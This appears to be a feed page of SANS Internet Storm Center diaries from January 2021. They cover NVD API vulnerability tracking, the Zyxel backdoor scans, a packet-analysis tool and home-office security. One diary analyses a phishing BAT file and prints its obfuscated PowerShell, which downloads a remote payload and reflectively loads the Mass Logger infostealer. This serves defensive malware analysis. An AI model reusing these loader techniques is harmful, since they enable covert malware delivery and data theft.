SANS

Subscribe to SANS hírcsatorna SANS
SANS Internet Storm Center - Cooperative Cyber Security Monitor
Frissítve: 57 perc 48 másodperc
2021. január 7.

Using the NIST Database and API to Keep Up with Vulnerabilities and Patches (Part 1 of 3), (Thu, Jan 7th)

It's been a while since NIST changed the API for their NVD (National Vulnerability Database), so I (finally) got around to writing some code against that API.  This API gives you a way for your code to query CVE's (Common Vulnerabilities and Exposures) against a broad range of products (or against specific products).  What this immediately brought to my mind was what I always ask my clients to put in someone's job description "monitor vendor announcements and industry news for vulnerabilities in the products in use by the organization".  This can be a tough row to hoe, especially if we're not talking the Microsoft / Cisco / Oracle and other "enterprise flagship" products - the ones that might immediately come to mind - if you monitor the cve list you'll see dozens or hundreds of CVEs scroll by in a day.   Also, subscribing to all the vendor security newsgroups and feeds can also quickly turn into a full-time proposition.  I think using the NIST API can be a viable alternative to just plain "keeping up".  CVE's often are a few days behind vendor announcements and patches, but on the other hand the CVE database is a one-stop-shop, (theoretically) everything is posted here.

In most cases I'd expect a hybrid approach - monitor industry news and vendor sources for your "big gun" applications, and then query this database for everything (to catch smaller apps and anything missed on your list of major apps).

First of all, in this API products are indexed by "CPE" (Common Platform Enumeration), a structured naming convention.  Let's see how this works - first, let's query the CPE database to get the NVD representation of the products that you have in your organization.  You can do this iteratively.

For instance, to get PeopleSoft versions, starty by querying Oracle products:

https://services.nvd.nist.gov/rest/json/cpes/1.0?cpeMatchString=cpe:2.3:*:oracle

Then narrow it down with the info you find in that search to get PeopleSoft.  

https://services.nvd.nist.gov/rest/json/cpes/1.0?cpeMatchString=cpe:2.3:*:oracle:peoplesoft_enterprise

As you can see, you can narrow this down further by version:

https://services.nvd.nist.gov/rest/json/cpes/1.0?cpeMatchString=cpe:2.3:a:oracle:peoplesoft_enterprise:8.22.14

.. however you might also want to leave that a bit open - you don't want to be in the position where your Operations team has updated the application but maybe didn't tell the security team or the security developer team (that'd be you).
(Or the dev-sec-dev-devops or whatever we're calling that these days :-))

Repeat this process for everything in your organization's flock of applications and Operating Systems.  As with all things of this type, of course test with one or three applications/CPEs, then grow your list over time.  You can use our previous diary on collecting hardware and software inventories (CIS Critical Controls 1 and 2) - code for these is here:
https://github.com/robvandenbrink/Critical-Controls/tree/master/CC01
https://github.com/robvandenbrink/Critical-Controls/tree/master/CC02

Full docs for the CPE API are here:
https://csrc.nist.gov/publications/detail/nistir/7696/final
https://csrc.nist.gov/CSRC/media/Projects/National-Vulnerability-Database/documents/web%20service%20documentation/Automation%20Support%20for%20CPE%20Retrieval.pdf

So how do we translate from a "real" inventory as reported by Windows WMI or PowerShell to what the CPE API expects?  The short answer is "the hard way" - we hit each application, one by one, and do a "it looks sorta like this" query.  The NVD gives us a handy page to do this in - for a manual thing like this I find the website to be quicker than the API.
First, navigate to https://nvd.nist.gov/products/cpe/search/

Then, put in your application name, vendor name, or any substring of those.

For instance, putting in "AutoCad" gives you 4 pages of various versions and application "bolt-ons" (or "toolsets" in autocad-speak).  It's interesting that the versioning convention is not standard, not even in this single first product example.
Some versions are named as "autocad:2010", and some are named as "autodesk:autocad_architecture_2009"
What you'll also find in this exploration is that "AutoCad version 2020" is actually version "24.0" as reported by the Windows interfaces - some of this oddness creeps into the CPE database as well.

Looking at a few apps that are more commonly used, let's look at the Adobe and FoxIT PDF readers.

To get all current-ish versions of FoxIT reader, we'll look for 10.0 and 10.0.1, these boil down to:

cpe:2.3:a:foxitsoftware:foxit_reader:10.*

This query gives us a short list:

cpe:2.3:a:foxitsoftware:foxit_reader:10.0.0:*:*:*:*:*:*:*
cpe:2.3:a:foxitsoftware:foxit_reader:10.0.0.35798:*:*:*:*:*:*:*
cpe:2.3:a:foxitsoftware:foxit_reader:10.0.1.35811:*:*:*:*:*:*:*


For our final list, we'll modify that last one to catch future sub-versions of 10.0.1, as:

cpe:2.3:a:foxitsoftware:foxit_reader:10.0.1.*

Looking for Adobe Reader DC version 19 and 20, we end up with:

cpe:2.3:a:adobe:acrobat_reader_dc:19.*
cpe:2.3:a:adobe:acrobat_reader_dc:20.*

This all looks straightforward, except that when you look at a few versions of 20, it looks like:

cpe:2.3:a:adobe:acrobat_reader_dc:20.009.20074:*:*:*:continuous:*:*:*
cpe:2.3:a:adobe:acrobat_reader_dc:20.001.30002:*:*:*:classic:*:*:*


So you'd think a properly formed query for version 20/classic would look like:
cpe:2.3:a:adobe:acrobat_reader_dc:20.*.*:*:*:*:classic:*:*:* - but no, that doesn't work

So you see, there's a bit of back-and-forth for each one - for each of my clients I tend to put an afternoon aside to turn their software inventory into a "CPE / CVE friendly" inventory.
You can speed this process up by downloading the entire CPE dictionary and "grep" through it for what you need: https://nvd.nist.gov/products/cpe
Just using grep, you now likely relate your software inventory back to the CPE dictionary much easier - for instance:

>type official-cpe-dictionary_v2.3.xml | grep -i title | grep -i microsoft | grep -i office
    <title xml:lang="en-US">Avery Wizard For Microsoft Office Word 2003 2.1</title>
    <title xml:lang="en-US">Microsoft BackOffice</title>
    <title xml:lang="en-US">Microsoft BackOffice 4.0</title>
    <title xml:lang="en-US">Microsoft BackOffice 4.5</title>
    <title xml:lang="en-US">Microsoft backoffice_resource_kit</title>
    <title xml:lang="en-US">Microsoft backoffice_resource_kit 2.0</title>
    <title xml:lang="en-US">Microsoft Office Excel 2002 Service Pack 3</title>
    <title xml:lang="en-US">Microsoft Office Excel 2003 Service Pack 3</title>
    <title xml:lang="en-US">Microsoft Office Excel 2007 Service Pack 2</title>
    <title xml:lang="en-US">Microsoft Office Excel 2007 Service Pack 3</title>
    <title xml:lang="en-US">Microsoft Office Excel 2010</title>
    <title xml:lang="en-US">Microsoft Office Excel 2010 Service Pack 1</title>
    <title xml:lang="en-US">Microsoft Office Excel 2010 Service Pack 2 x64 (64-bit)</title>
    <title xml:lang="en-US">Microsoft Office Excel 2010 Service Pack 2 x64 (64-bit)</title>
    <title xml:lang="en-US">Microsoft Office Excel 2010 Service Pack 2 x86 (32-bit)</title>
    <title xml:lang="en-US">Microsoft Internet Explorer 5 (Office 2000)</title>
    <title xml:lang="en-US">Microsoft Internet Explorer 5.01 (Office 2000 SR-1)</title>
    <title xml:lang="en-US">Microsoft Office</title>
    <title xml:lang="en-US">Microsoft Office 3.0</title>
    <title xml:lang="en-US">Microsoft Office 4.0</title>
    <title xml:lang="en-US">Microsoft Office 4.3</title>
    <title xml:lang="en-US">Microsoft Office 95</title>
    <title xml:lang="en-US">Microsoft Office 97</title>
    < ... more older versions .. >
    <title xml:lang="en-US">Microsoft Office 2013</title>
    <title xml:lang="en-US">Microsoft Office 2013 RT</title>
    <title xml:lang="en-US">Microsoft Office 2013 Click-to-Run (C2R)</title>
    <title xml:lang="en-US">Microsoft Office 2013 RT Edition</title>
    <title xml:lang="en-US">Microsoft Office 2013 x64 (64-bit)</title>
    <title xml:lang="en-US">Microsoft Office 2013 x86 (32-bit)</title>
    <title xml:lang="en-US">Microsoft Office 2013 SP1</title>
    <title xml:lang="en-US">Microsoft Office 2013 Service Pack 1 x64 (64-bit)</title>
    <title xml:lang="en-US">Microsoft Office 2013 Service Pack 1 on X86</title>
    <title xml:lang="en-US">Microsoft Office 2013 RT SP1</title>
    <title xml:lang="en-US">Microsoft Office 2013 Service Pack 1 RT Edition</title>
    <title xml:lang="en-US">Microsoft Office 2016</title>
    <title xml:lang="en-US">Microsoft Office 2016 x64 (64-bit)</title>
    <title xml:lang="en-US">Microsoft Office 2016</title>
    <title xml:lang="en-US">Microsoft Office 2016 for MacOS</title>
    <title xml:lang="en-US">Microsoft Office 2016 Click-to-Run (C2R)</title>
    <title xml:lang="en-US">Microsoft Office 2016 Click-to-Run (C2R) x64 (64-bit)</title>
    <title xml:lang="en-US">Microsoft Office 2016 MacOS Edition</title>
    <title xml:lang="en-US">Microsoft Office 2016</title>
    <title xml:lang="en-US">Microsoft Office 2016 Mac OS Edition</title>
    <title xml:lang="en-US">Microsoft Office 2016</title>
    <title xml:lang="en-US">Microsoft Office 2019</title>
    <title xml:lang="en-US">Microsoft Office 2019 on x64</title>
    <title xml:lang="en-US">Microsoft Office 2019 on x86</title>
    <title xml:lang="en-US">Microsoft Office 2019 for Mac OS</title>
    <title xml:lang="en-US">Microsoft Office 2019 for Mac OS X</title>
    <title xml:lang="en-US">Microsoft Office 2019 for macOS</title>
    <title xml:lang="en-US">Microsoft Office 2019 Mac OS Edition</title>
    <title xml:lang="en-US">Microsoft Office 2013 RT</title>
    < and so on ... >

You can see this list relates much better to your "actual" inventory as reported by more "traditional" means (WMI / Powershell).  
Now refine this list, relating the results back to your real inventory.  Sorry, since the "match" on the title isn't always exact, this again usually involves some manual components.  Even mainstream products don't always have a match.

For instance, looking for MS Project 2013:
From our cross-domain software inventory (in PowerShell) we have:

> $domainapps.name | grep "Project"
Microsoft Project MUI (English) 2013
Microsoft Project Professional 2013

And from the CPE Dictionary:

>type official-cpe-dictionary_v2.3.xml | grep -i title | grep -i microsoft | grep -i project | grep 2013
    <title xml:lang="en-US">Microsoft Project 2013 Service Pack 1</title>
    <title xml:lang="en-US">Microsoft Project Server 2013</title>
    <title xml:lang="en-US">Microsoft Project Server 2013 Service Pack 1</title>
    <title xml:lang="en-US">Microsoft Project Server 2013 Service Pack 1 (x64) 64-bit</title>

So a match, but not exact.

Another illustration - even MS Word there isn't an exact match, in almost every case we're either picking a few CPE's or guesstimating for the closest one:

> $domainapps.name | grep "Word"
Microsoft Word MUI (English) 2013

>type official-cpe-dictionary_v2.3.xml | grep -i title | grep -i microsoft | grep -i word | grep 2013
    <title xml:lang="en-US">Microsoft Word 16.0.11425.20132 for Android</title>
    <title xml:lang="en-US">Microsoft Word 2013</title>
    <title xml:lang="en-US">Microsoft Word 2013 RT Edition</title>
    <title xml:lang="en-US">Microsoft Word 2013 for Microsoft Windows RT</title>
    <title xml:lang="en-US">Microsoft Word 2013 Service Pack 1</title>
    <title xml:lang="en-US">Microsoft Word 2013 Service Pack 1 x64 (64-bit)</title>
    <title xml:lang="en-US">Microsoft Word 2013 Service Pack 1 on x86</title>
    <title xml:lang="en-US">Microsoft Word 2013 SP1 RT</title>
    <title xml:lang="en-US">Microsoft Word RT 2013 Service Pack 1</title>

 

Where this plays well for me is if I exclude Windows and Office - just using Windows Update (or  your WSUS, SCCM or whatever patch manager you use), then auditing the "last updated" date for Windows tends to catch those really well.  It's the MS server apps - Exchange, SQL and so on, and everything that isn't Microsoft where this method really helps turn the flood of CVE information into a once a week summary that you can use.

 

As you'd expect, if you are in a niche industry, you may not find all of your applications - for instance ICS clients and Banking clients may not find their user-facing main business applications in the CPE list, and sadly will never see CVEs to keep their vendors honest.

In a welcome recent development, as I was writing this article I noticed that if your application has a listening port, nmap will make a reasonably good estimate of what that application is with the "sV" option (Probe open ports to determine service/version info).   In the example below nmap very nicely inventories my ESXI 7.0 server, and gives me the exact CPE for it:

C:\>nmap -sV -p 443 --open 192.168.122.51
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-06 18:45 Eastern Standard Time
Nmap scan report for 192.168.122.51
Host is up (0.0011s latency).

PORT    STATE SERVICE   VERSION
443/tcp open  ssl/https VMware ESXi SOAP API 7.0.0
MAC Address: 00:25:90:CB:00:18 (Super Micro Computer)
Service Info: CPE: cpe:/o:vmware:ESXi:7.0.0

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 145.70 seconds


Now, with your software inventory complete and your CPE strings in hand, you can start querying for CVE's!

Sticking with our Acrobat and FoxIT examples, we can search for all CVE's -  to do this we'll change the API URI called slightly, all the URI conventions stay consistent:

https://services.nvd.nist.gov/rest/json/cves/1.0?cpeMatchString=cpe:2.3:a:adobe:acrobat_reader_dc:20.*

Now things start to look interesting! Of course, given our search this gets us a boatload of CVE's.  Let's look for the last 60-0ish days - we'll querying "modified since a Nov 1, 2020":

https://services.nvd.nist.gov/rest/json/cves/1.0?modStartDate=2020-11-01T00:00:00:000%20UTC-05:00&cpeMatchString=cpe:2.3:a:adobe:acrobat_reader_dc:20.*

Keep in mind to that there are a few dates involved- the publishedDate and lastModifiedDate.  While the NVD examples typically go after "last modified", I've seen CVE's from the mid 2000's with a "last modified" date in 2019 - so be careful.  Normally I'm querying using "publishedDate".

Again, rinse and repeat for all of your CPE's collected.  We're still playing in the browser, but you can see it's a simple query, and the return values are in JSON, so things look simple.  Except that as things nest and nest, what looks simple on the screen isn't necessarily simple in code.  For instance, to get the CVE numbers for the Acrobat Reader DC 20 query above, the PowerShell code looks like:

$request = "https://services.nvd.nist.gov/rest/json/cves/1.0?modStartDate=2020-11-01T00:00:00:000%20UTC-05:00&cpeMatchString=cpe:2.3:a:adobe:acrobat_reader_dc:20.*"
$CVES = (invoke-webrequest $request | ConvertFrom-Json).result.CVE_items.cve.CVE_data_meta.id
$CVES

CVE-2020-24439
CVE-2020-24438
CVE-2020-24436
CVE-2020-24434
CVE-2020-24426
CVE-2020-24437
CVE-2020-24435
CVE-2020-24433
CVE-2020-24432
CVE-2020-24431
CVE-2020-24430
CVE-2020-24429
CVE-2020-24428
CVE-2020-24427

While this is starting to get useful, keep in mind that it's only as good as the database.  For instance, looking at any particular product, writing it will involve the use of a language and likely some libraries, maybe a framework and some other components.  There isn't a team of elves drawing up that heirarchy for public comsumption anywhere.  We can only hope that the dev team who wrote the thing is keeping that list for their own use! (hint - lots of them are not).

You can deconstruct any particular application to some degree ( https://isc.sans.edu/forums/diary/Libraries+and+Dependencies+It+Really+is+Turtles+All+The+Way+Down/20533/ ), but if you go that deep, you'll find that your list will likely see components get added or removed from version to version - it'll turn into a whack-a-mole-science-project in no time!
For a point-in-time application pentest this can be useful, but to just keep tabs on how your security posture is from week to week, you'll likely find yourself spending more time on application archeology than it's worth.

All is not lost though - as we've seen above we can get useful information just at the application level - and keep in mind the CVE list is what your scanner uses as it's primary source, also your red team, your malware, and any "hands on keyboard" attackers that your malware escorts onto your network.  So while the CVE list will never be complete, it's the data all of your malicious actors go to first.


Let's dig deeper into this - with our inventory of CPE's now solid, tomorrow we'll play more with the API details the CVE level, and Monday there'll be a full working app (I promise!) that you can use in your organization.

==== of note ====

In the course of me playing with this API, I ended up opening a case with the folks at the NIST, they were very responsive (2 day turnaround from initial question to final answer), which for me is very responsive, especially for a free product!

===============
References:

Full docs for CVE API are here:
https://csrc.nist.gov/publications/detail/nistir/7696/final
https://csrc.nist.gov/CSRC/media/Projects/National-Vulnerability-Database/documents/web%20service%20documentation/Automation%20Support%20for%20CPE%20Retrieval.pdf

===============
Rob VandenBrink
rob@coherentsecurity.com

 

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. január 7.

ISC Stormcast For Thursday, January 7th, 2021 https://isc.sans.edu/podcastdetail.html&#x3f;id=7318, (Thu, Jan 7th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. január 6.

Scans for Zyxel Backdoors are Commencing., (Wed, Jan 6th)

It was the day (or two days actually) before Christmas when Niels Teusing published a blog post about a back door in various Zyxel products [1]. Niels originally found the vulnerability in Zyxel's USG40 security gateway, but it of course affects all Zyxel devices using the same firmware. According to Zyxel, the password was used "to deliver automatic firmware updates to connected access points through FTP" [2]. So in addition to using a fixed password, it appears the password was also sent in the clear over FTP.

Zyxel products are typically used by small businesses as firewalls and VPN gateways. ("Unified Security Gateway"). There is little in terms of defense in depth that could be applied to protect the device, and in ssh and the VPN endpoint via HTTPS are often exposed. The default credentials found by Niels are not just limited to ftp. They can be used to access the device as an administrator via ssh.

So yet again, we do have a severe "stupid" vulnerability in a device that is supposed to secure what is left of our perimeter.

Likely due to the holidays, and maybe because Niels did not initially publish the actual password, widespread exploitation via ssh has not started until now. But we are no seeing attempts to access our ssh honeypots via these default credentials. 

The scans started on Monday afternoon (I guess they first had to adapt their scripts in the morning) initially mostly from %%ip:185.153.196.230%%. On Tuesday, %%ip:5.8.16.167%% joined in on the fun and finally today, we have %%ip:45.155.205.86%%. The last IP has been involved in scanning before. 

What can/should you do?

  • If you are using affected devices: UPDATE NOW. See Zyxel's advisory here. Please call Zyxel support if you have questions.
  • If you are using any kind of firewall/gateway/router, no matter the vendor, limit its admin interface exposure to the minimum necessary. Avoid exposing web-based admin interfaces. Secure ssh access best you can (public keys...). In the case of a hidden admin account, these measures will likely not help, but see if you can disable password authentication. Of course, sometimes, vendors choose to hide ssh keys instead of passwords.
  • Figure out a way to automatically get alerts if a device is running out of date firmware. Daily vulnerability scans may help. Automatic firmware updates, if they are even an option, are often considered too risky for a perimeter device.
  • If you are a vendor creating these devices: get your act together. It is ridiculous how many "static keys", "support passwords" and simple web application vulnerabilities are found in your "security" devices. Look over the legacy code and do not rely on independent researchers to do your security testing.

And as a side note for Fortinet users. See what the new year just got you:

https://www.fortiguard.com/psirt?date=01-2021 . 

 

[1] https://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html

[2] https://www.zyxel.com/support/CVE-2020-29583.shtml

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. január 6.

ISC Stormcast For Wednesday, January 6th, 2021 https://isc.sans.edu/podcastdetail.html&#x3f;id=7316, (Wed, Jan 6th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. január 5.

Netfox Detective: An Alternative Open-Source Packet Analysis Tool , (Tue, Jan 5th)

[This is a guest diary by Yee Ching Tok (personal website here (https://poppopretn.com)). Feedback welcome either via comments or our contact page (https://isc.sans.edu/contact.html)]

Various digital forensic artifacts are generated during intrusions and malware infections. Other than analyzing endpoint logs, memory and suspicious binaries, network packet captures offer a trove of information to incident handlers that could help them triage incidents quickly (such as determining if sensitive data had been exfiltrated). Popular tools such as WireShark, Ettercap, NetworkMiner or tcpdump are often used by incident handlers to analyze packet captures. However, there could be situations where a tool is unable to open up packet captures due to its size or being deliberately tampered (perhaps in Capture-the-Flag (CTF) challenges to increase difficulty and complexity). As such, being proficient in multiple alternative tools for packet analysis could come in handy, be it for handling incidents or for CTF challenges.

I recently came across an open-source tool for packet analysis named Netfox Detective [1], developed by the Networked and Embedded Systems Research Group at Brno University of Technology [2]. To showcase some of its features, I mainly used the packet capture created in my previous diary [3]. Firstly, with reference to Figure 1, a workspace needs to be created. As the name implies, the created workspace will contain artifacts such as packet captures or logs that would be analyzed (in this example, I only used network packet captures and did not import any logs).

Figure 1: Creation of Workspace for Analysis

Following that, I imported the network packet capture created in my previous diary [3] and Figure 2 shows an overview of the statistics of the packet capture. An interesting observation was that I did not know some packet loss occurred during the capture I made previously. It was also interesting to note that Netfox Detective utilized TCP heuristics that the creators have developed previously and improved on to mitigate corrupted or missing packets so as to collate as many network conversations as possible [4].

Figure 2: Overview of NAT Slipstreaming Packet Capture

As compared to WireShark where packets are displayed linearly, Netfox Detective has a tabbed view and displays the packets at Layer 3, Layer 4 and Layer 7 (linear option also available by selecting the “Frames” tab). Figure 3 shows the Layer 4 tab being selected and corresponding results being displayed.

Figure 3: Netfox Detective displaying Layer 4 Network Traffic

Selecting a conversation (highlighted in Figure 3) will add the selection in the “Conversation explorer” pane (highlighted by the red box in Figure 4). Double clicking the entry in “Conversation explorer” will create a new tab “Conversation detail” where a summary of the interaction is displayed (as shown in Figure 4). I found the Packet Sequence Chart to be very useful as it visualized when the various packets were transmitted with respect to their frame size.

Figure 4: Conversation detail view of 192.168.211.132 and 192.168.2.1

Following that, with reference to Figure 5, I selected frame number 336 for an in-depth look and we can see the ACK and RST flags being reflected in this packet (an expected finding as per the observations of NAT Slipstreaming experiment I done previously). 

Figure 5: Frame content view of Frame Number 336

There could be instances where analysis of multiple related network packet captures is needed in an incident. Netfox Detective allows multiple packet capture files to be imported into the same workspace (as shown in Figure 6). Over here, I used another packet capture created by Brad Duncan [5] to demonstrate the feature. 

Figure 6: Importing Multiple Packet Capture Files into the Same Workspace

As always, there are strengths and weaknesses in the various tools we use for packet analysis. Netfox Detective can only be installed on Microsoft Windows (Windows Vista SP2 or newer), and supports a smaller subset of protocols as compared to other tools such as WireShark [1]. However, the various tabbed views at Layer 3, 4 and 7, packet visualizations and ability to group related packet captures in a same workspace offers a refreshing perspective for incident handlers to perform their analysis/triage on network packet captures. Moreover, the open-source nature of Netfox Detective allows further enhancements to the tool itself.

For a complete read about Netfox Detective’s design decisions and technical implementations, their published paper is available here [4]. To download Netfox Detective, the information can be found on their GitHub page [1].

[1] https://github.com/nesfit/NetfoxDetective/
[2] https://nesfit.github.io/
[3] https://github.com/poppopretn/ISC-diaries-pcaps/blob/main/2020-11-NAT-Slipstream.zip
[4] https://doi.org/10.1016/j.fsidi.2020.301019
[5] https://www.malware-traffic-analysis.net/2020/11/10/index.html 
 

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. január 5.

ISC Stormcast For Tuesday, January 5th, 2021 https://isc.sans.edu/podcastdetail.html&#x3f;id=7314, (Tue, Jan 5th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. január 4.

From a small BAT file to Mass Logger infostealer, (Mon, Jan 4th)

Since another year went by, I’ve decided to once again check all of the malicious files, which were caught in my e-mail quarantine during its course. Last year, when I went through the batch of files from 2019, I found couple of very large samples[1] and I wanted to see whether I’d find something similar in the 2020 batch.

I started with just over 900 files of many different types and although I did notice couple of unusually large files, when one took their extensions into consideration (e.g. a JS file with size exceeding 1 MB, which turned out to be a sample of WSH RAT[2]), the largest sample in the batch overall was an EXE with the size of 17 MB. It was not small by any means, but its size was not too unusual either - it was definitely not in the same weight class as the 130 MB executable sent to us by one of our readers back in August[3].

On the other side of the size spectrum, situation was pretty much the same – there were also not any files which would be interesting because of their exceptional size (or lack thereof). While quickly going over the small files, one of them however did catch my eye. Among the smallest executable scripts was a 1.68 kB BAT file from September 2020 with the name of “A megállapodás feltételei_doc04361120200812113759-ACF.28668_DPJ2020012681851.PDF.bat” (first part roughly translates as “Terms of agreement” from Hungarian), which contained the following slightly obfuscated PowerShell script, which turned out to be quite interesting.

@echo off Start /MIN Powershell -WindowStyle Hidden -command "$Dxjyp='D4@C7@72@72... ... ...F6@26@45@42'; $text =$Dxjyp.ToCharArray(); [Array]::Reverse($text); $tu=-join $text; $jm=$tu.Split('@') | forEach {[char]([convert]::toint16($_,16))}; $jm -join ''|I`E`X"

After reversing and decoding the contents of the $Dxjyp variable, the main body of the script became readable. The script was supposed to download and execute contents of the file A12.jpg downloaded from http[:]//topometria[.]com[.]cy.

$Tbone='*EX'.replace('*','I'); sal M $Tbone; do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping); $p22 = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072); [System.Net.ServicePointManager]::SecurityProtocol = $p22; $mv='(N'+'ew'+'-O'+'b'+'je'+'c'+'t '+ 'Ne'+'t.'+'W'+'eb'+'C'+'li'+'ent)'+'.D'+'ow'+'nl'+'oa'+'d'+'S'+'tr'+'ing(''http[:]//topometria[.]com[.]cy/A12.jpg'')'|I`E`X; $asciiChars= $mv -split '-' |ForEach-Object {[char][byte]"0x$_"}; $asciiString= $asciiChars -join ''|M

The URL contained withing the script is no longer active, but I managed to find a copy of the A12.jpg file downloaded in an Any.Run task from September, in which someone analyzed differently named (but functionally identical) version of the batch script[4].

The JPG file (that was of course not JPG at all) was 3.25 MB in size. This turned out not to be too much when one considers that it contained the main malicious payload in the form of one EXE and one DLL, but before we get to these files, let’s quickly take a look at A12.jpg.

Its contents looked exactly as one would expect given the last two lines of the PowerShell code we’ve seen above (i.e. hex-encoded ASCII characters separated by hyphens).

24-74-30-3D-2D-4A-6F-69-6E-20-28-28-31-31-... ... ... 0D-0A-20-20-0D-0A-0D-0A-0D-0A-20-20

At this point it is good to mention that for the purposes of analyzing any potentially malicious code, it can be invaluable to remember hex values of several of ASCII characters. Besides the usual “M” (0x4D) and “Z” (0x5A), which create the header of Windows PE executables, as well as couple of others, it may be a good idea to also remember that “$” has the hex value 0x24. In this way, even if we got our hands on the A12.JPG file without any other context, we might deduce that it might contain code in one of the languages, in which the dollar sign is used to denote variables.

After decoding the downloaded file, it became obvious that it did indeed contain a part of a PowerShell script. What was especially interesting about it were two variables which seemed to each contain a PE structure.

$t0=-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])}); sal g $t0 [String]$nebj='4D5A9>^>^3>^>^>^04>^>^>^FFFF>^>^B8>^... ... ...>^'.replace('>^','00') function PuKkpsGJ { param($gPPqxvJ) $gPPqxvJ = $gPPqxvJ -split '(..)' | ? { $_ } ForEach ($wbdtbuBT in $gPPqxvJ){ [Convert]::ToInt32($wbdtbuBT,16) } } [String]$CDbvWcpeO='4D5A9>^>^3>^>^>^04>^>^>^FFFF>^>^B8>^... ... ...>^'.replace('>^','00') [Byte[]]$JJAr=PuKkpsGJ $CDbvWcpeO $y='[System.Ap!%%%%#######@@@@@@@****************ain]'.replace('!%%%%#######@@@@@@@****************','pDom')|g; $g55=$y.GetMethod("get_CurrentDomain") $uy='$g55.In!%%%%#######@@@@@@@****************ke($null,$null)'.replace('!%%%%#######@@@@@@@****************','vo')| g $vmc2='$uy.Lo!%%%%#######@@@@@@@****************($JJAr)'.Replace('!%%%%#######@@@@@@@****************','ad') $vmc2| g [Byte[]]$nebj2= PuKkpsGJ $nebj [g8fg0000.gfjhfdgpoerkj]::gihjpdfg('InstallUtil.exe',$nebj2)

Indeed, after replacing all of the “>^” pairs in the two variables with “00” and saving the resultant values from each of the variables in a file, the hypothesis was proven true. There were indeed two PE files contained within the script – one 42 kB DLL and one 514 kB EXE, both written in the .NET family of languages.

After a little more deobfuscation of the script in A12.jpg, it became obvious that it basically amounted to the following two lines of code, in which the purpose of the two files can be clearly seen – the script was supposed to load the DLL into memory and then ensure execution of the main malicious executable with its help.

[System.AppDomain].GetMethod("get_CurrentDomain").Invoke($null,$null).Load([DLL file])| IEX [g8fg0000.gfjhfdgpoerkj]::gihjpdfg('InstallUtil.exe',[EXE file])

Indeed, you may see the relevant part of the DLL in the following image.

After a quick analysis, the EXE file itself turned out to be a sample of the Mass Logger infostealer.

Although I didn’t find any exceptionally large or small malicious files in the batch of quarantined e-mails from 2020, the small BAT file discussed above turned out to be quite interesting in its own way, as the following chart summarizes.

Let us see what 2021 brings us in terms of malware - perhaps next year, we will have a chance to take a look at something exceptionally small or unusually large again...

Indicators of Compromise (IoCs)

A megállapodás feltételei_doc04361120200812113759-ACF.28668_DPJ2020012681851.PDF.bat (1.68 kB)
MD5 - 71bdecdea1d86dd3e892ca52c534fa13
SHA1 - 72071a7e760c348c53be53b6d6a073f9d70fbc4b

A12.jpg (3.25 MB)
MD5 - 60b86e4eac1d3eeab9980137017d3f65
SHA1 - d41b417a925fb7c4a903dd91104ed96dc6e1982b

ManagmentClass.dll (42 kB)
MD5 - 8a738f0e16c427c9de68f370b2363230
SHA1 - 0ac18d2838ce41fe0bdc2ffca98106cadfa0e9b5

service-nankasa.com-LoggerBin.exe (514 kB)
MD5 - 4b99184764b326b10640a6760111403d
SHA1 - 2a61222d0bd7106611003dd5079fcef2a9012a70

[1] https://isc.sans.edu/forums/diary/Picks+of+2019+malware+the+large+the+small+and+the+one+full+of+null+bytes/25718
[2] https://app.any.run/tasks/801cb6a1-6c66-4b98-8b38-14b3e56d660a/
[3] https://isc.sans.edu/forums/diary/Definition+of+overkill+using+130+MB+executable+to+hide+24+kB+malware/26464/
[4] https://app.any.run/tasks/32b4519f-3c10-40f5-a65a-7db9c3a57fd0/

-----------
Jan Kopriva
@jk0pr
Alef Nula

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. január 4.

ISC Stormcast For Monday, January 4th 2021 https://isc.sans.edu/podcastdetail.html&#x3f;id=7312, (Mon, Jan 4th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. január 3.

Protecting Home Office and Enterprise in 2021, (Sat, Jan 2nd)

Because of COVID, 2020 saw a major shift from working at the "office" to working at home which led to shift the attacks to the user @home. Everything points that 2020 was a year for ransomware and COVID-19 themed campaigns. Without exceptions, phishing emails have been the most prolific initial attack vector targeting organizations and home users. This will likely get worse and more disruptive this coming year.

Past 14 Days - My IP Threat Intel Activity

Every year there are prediction on what we should expect in the coming year and what to watch for. Instead, what can be done to secure the enterprise?

  • Implement multi-factor authentication
  • Extending security to a remote force
  • Review cloud security policies
  • Better protection for IoT
  • Must ensure backups are secure and cannot be reached to prevent attackers from finding and delete them
  • Equally important - regularly test backups to ensure the data can be recovered
  • Use and share Threat Intel to track suspicious activity [1][2]
  • Better network analytics and log collection [3][4][5]
  • Monitor host and network activity [3][4][5]
  • Better detection and prevention against phishing email attacks [10]
  • Review and test employees against security awareness program [11]
  • Apply system security update as soon as appropriate
  • Keep antivirus software current

Over the past year, one of the most difficult tasks has been how to detect and prevent being compromised by unmanaged devices. With a large population of employees working from a home office, some forced to use their personal devices, if compromised, have the potential of exploiting other systems in their home network as well as the enterprise connected network (i.e. VPN access to employer network). This challenge will continue for the forceable future.

Share your predictions for 2021, what is going to keep you up at night?

[1] https://www.anomali.com/resources/staxx
[2] https://otx.alienvault.com
[3] https://www.elastic.co
[4] http://rocknsm.io
[5] https://securityonionsolutions.com
[6] https://us-cert.cisa.gov
[7] https://cyber.gc.ca
[8] https://www.ncsc.gov.uk
[9] https://www.enisa.europa.eu/topics/csirts-in-europe
[10] https://cyber.gc.ca/en/assemblyline
